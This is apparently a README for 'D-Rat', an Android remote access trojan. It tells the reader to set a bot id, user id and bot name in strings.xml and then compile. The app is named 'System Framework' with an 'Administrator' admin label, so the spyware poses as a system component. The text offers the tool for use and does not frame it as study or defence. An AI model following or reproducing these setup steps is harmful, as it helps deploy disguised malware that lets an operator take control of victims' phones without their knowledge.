# D-Rat
Edit: DTRat\app\src\main\res\values\strings.xml

<?xml version="1.0" encoding="utf-8"?>
<resources>

    <string name="app_name">System Framework</string>
	<string name="admin_name">Administrator</string>
	<string name="botid">your-bot-id</string>
	<!--string name="userid">your-user-id</string-->
	<string name="userid">your-user-id</string>
	<string name="takmaad">bot-name</string>
</resources>

and compile

